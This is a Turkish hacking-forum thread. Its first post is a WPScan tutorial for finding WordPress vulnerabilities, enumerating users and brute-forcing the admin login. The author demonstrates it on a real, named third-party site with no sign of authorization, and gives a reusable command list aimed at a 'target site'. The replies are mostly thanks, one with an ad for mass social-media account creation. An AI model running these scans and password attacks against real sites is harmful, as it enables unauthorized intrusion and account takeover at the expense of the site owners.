Konuyu Oyla:
  • Toplam: 0 Oy - Ortalama: 0
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: Kali Linux Wpscan Kullanımı & Videolu
M3czup
*
avatar
Teğmen - Ex
Durum: Çevrimdışı
Seviye Puanı: 26
Yaşam Puanı: 629 / 629
Deneyim: 16 / 100
Rep Sayısı: 82
Mesaj Sayısı: 852
Üyelik Tarihi: 18.12.2017
     
Yorum: #1
Kali Linux Wpscan Kullanımı & Videolu
14.07.2018 13:50
WpScan Nedir?​


Wordpress siteler üzerindeki açıkları tarayar ve kaba kuvvet yöntemi ile site admin giriş bilgilerini alabilmemize yarayan windows'da kullandığımız bruteforce programının linux halidir ancak ondan daha gelişmiştir çünkü açıkları bulabilmemizi sağlar



Nasıl Kullanılır ?​



Öcelikle terminali açarak wpscan --help yazalım arkadaşlar


Karşımıza şu şekilde bi ekran gelecek arkadaşlar .Burdaki parametreler üzerinden anlatım

yapacağım ama hepsini kullanmayacağız tabikide sadece admin giriş bilgilerini bulmaya çalışacağız .

Öncelikle bir site bulalım ben bunu buldum arkadaşlar mailfunnels.com (şifre denemesi yaptım ancak tutmadı ancak mantığı anlarsınız ).


Öncelikle

wpscan --url mailfunnels.com

bu komut ile sitenin tamamı hakkında bilgi alalım .Bu tema ve eklentileri de beraber tarar arkadaşlar.

Sonuç olarak karşımıza şöyle bir ekran gelir.



Burda kırmızı şekilde ünlem olanlar açıklar dır arkadaşlar .


Şimdi kullanıcı usernamesini bulalım .Bunun için şu komutu çalıştıralım


wpscan --url mailfunnels.com --enumerate u



Görüldüğü gibi arkadaşlar;

username : admin


Şimdi masaüstünde bir wordlist oluşturalım içinede tahmini olabilecek şifreleri yazalım ben sadece admin yazdım


wpscan --url mailfunnels.com --wordlist /root/wordlist.txt --username admin


Burda --wordlistten sonraki kısım için masaüstüde oluşturduğunuz txt dosyasını --wordlistten sonraki kısma taşıyalım üstteki gibi olacaktır arkadaşlar sonra devamını yazalım ve ENTER diyelim .



Böyle bir sonuc aldık arkadaşlar .Dediğim gibi şifre tutmadı ama mantık bu şekilde .

Alt tarafta videoda hazır arkadaşlar izlerseniz biraz daha iyi anlarsınız

*

VİDEO

*








Komutlar:

Kod:
wpscan --url www.hedefsite.com // Site ile ilgili version tema eklenti vb. temel bilgileri verir .

wpscan --url www.hedefsite.com --enumerate p //Pluginleri ayrıntılı olarak tarar ve

açıklarını bildirir.

wpscan --url www.hedefsite.com --enumerate t //Temaları ayrıntılı olarak tarar ve

açıklarını bildirir.

wpscan --url www.hedefsite.com --enumerate u //Kullanıcıları arar ve bulduklarını

bildirir bu yolla bruteforce için kullanıcı adı belli olur.

wpscan --url www.hedefsite.com --wordlist /root/wordlist.txt --username admin //Seçilen

kulllanıcı adı üzerine bruteforce saldırısı yapar
Alinti
Rep Verenler: The_ZiziL
[email protected]
avatar
Kondom Mağduru
Durum: Çevrimdışı
Seviye Puanı: 26
Yaşam Puanı: 253 / 633
Deneyim: 33 / 100
Rep Sayısı: 123
Mesaj Sayısı: 865
Üyelik Tarihi: 05.05.2013
     
Yorum: #2
RE: Kali Linux Wpscan Kullanımı & Videolu
14.07.2018 18:50
Teşekkürler, Emeğine Sağlık Smile kalinin sadece bir anı olarak kalması bende güzel oldu Smile
Alinti
The_ZiziL
*
avatar
Valhalla
Durum: Çevrimdışı
Seviye Puanı: 36
Yaşam Puanı: 894 / 894
Deneyim: 76 / 100
Rep Sayısı: 575
Mesaj Sayısı: 1971
Üyelik Tarihi: 06.02.2017
     
Yorum: #3
RE: Kali Linux Wpscan Kullanımı & Videolu
15.07.2018 11:09
Teşekkürler, Emeğine Sağlık.

Allah’tan utanmayan insanlardan da utanmaz…
Alinti
Dessy
*
avatar
Yarbay
Durum: Çevrimdışı
Seviye Puanı: 22
Yaşam Puanı: 241 / 525
Deneyim: 3 / 100
Rep Sayısı: 106
Mesaj Sayısı: 576
Üyelik Tarihi: 20.11.2015
     
Yorum: #4
RE: Kali Linux Wpscan Kullanımı & Videolu
16.07.2018 16:19
Teşekkürler, emeğine sağlık.

İnstagram Sınırsız Hesap > Git
Youtube Sınırsız Hesap > Git
Sosyal Medyada Sınırsız Hesap Açma p2 Yakında.
Alinti
finndev
*
avatar
Yüzbaşı
Durum: Çevrimdışı
Seviye Puanı: 10
Yaşam Puanı: 27 / 246
Deneyim: 84 / 100
Rep Sayısı: 8
Mesaj Sayısı: 139
Üyelik Tarihi: 28.11.2015
     
Yorum: #5
RE: Kali Linux Wpscan Kullanımı & Videolu
16.07.2018 21:39
Teşekkürler, Emeğine Sağlık Smile
Alinti



1 Ziyaretçi